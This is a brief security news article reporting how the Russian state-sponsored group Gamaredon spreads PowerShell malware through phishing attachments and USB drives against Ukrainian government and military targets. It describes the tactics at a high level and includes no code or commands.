HQ/EMEAFind out how we can help your business
Gamaredon, a Russian state-sponsored threat group, has continued infecting critical organisations in Ukraine’s security and military sector by employing new toolsets and infection tactics.
Based on reports, the threat actors have started deploying USB malware strains to propagate to other systems inside compromised networks. Moreover, the Russian threat group’s new strategy targets a targeted company’s HR sectors. This detail implies that the attackers want to spread spear-phishing attacks within the infected organisations.
2023 has been a busy year for the Gamaredon group.
Researchers said the Gamaredon group’s activity increased between February and March this year. These hackers have maintained their presence on some of its compromised devices until last month.
The group continues to rely on phishing emails to start their attack. Their target selection has remained the same since they only focus on compromising government entities, such as the military, research organisations, and security.
The researchers also noticed that the group’s phishing emails carry HTA, LNK, SFX, DOCX, and RAR attachments. Once a target opens the emails, it will launch a PowerShell command that downloads a payload from the attacker-controlled C2 server.
A separate researcher studied 25 variants of the new PowerShell Scripts using varying levels of obfuscation and pointing to different Pterodo download IP addresses to avoid static detection prompts.
Next, the PowerShell copies itself onto the compromised device and generates a shortcut file using an extension. The LNKs developed by the script don various names, some selected specifically to tamper with the victims’ curiosity.
Lastly, the PowerShell script identifies all drives on the computer and copies itself to removable USB disks once the victim launches the files. This tactic will increase the success rate of the attackers in gaining lateral movement within the breached network.
Cybersecurity experts expect the Russian state-sponsored Gamaredon group to remain focused on targeted Ukraine as long as the geopolitical conflict does not end. Furthermore, the group have been refreshing their TTPs as they targeted information that could benefit the Russian military forces.
Ukrainian organisations, primarily government entities, should be careful in accessing emails since the earlier-mentioned threat group disseminates spear-phishing emails.
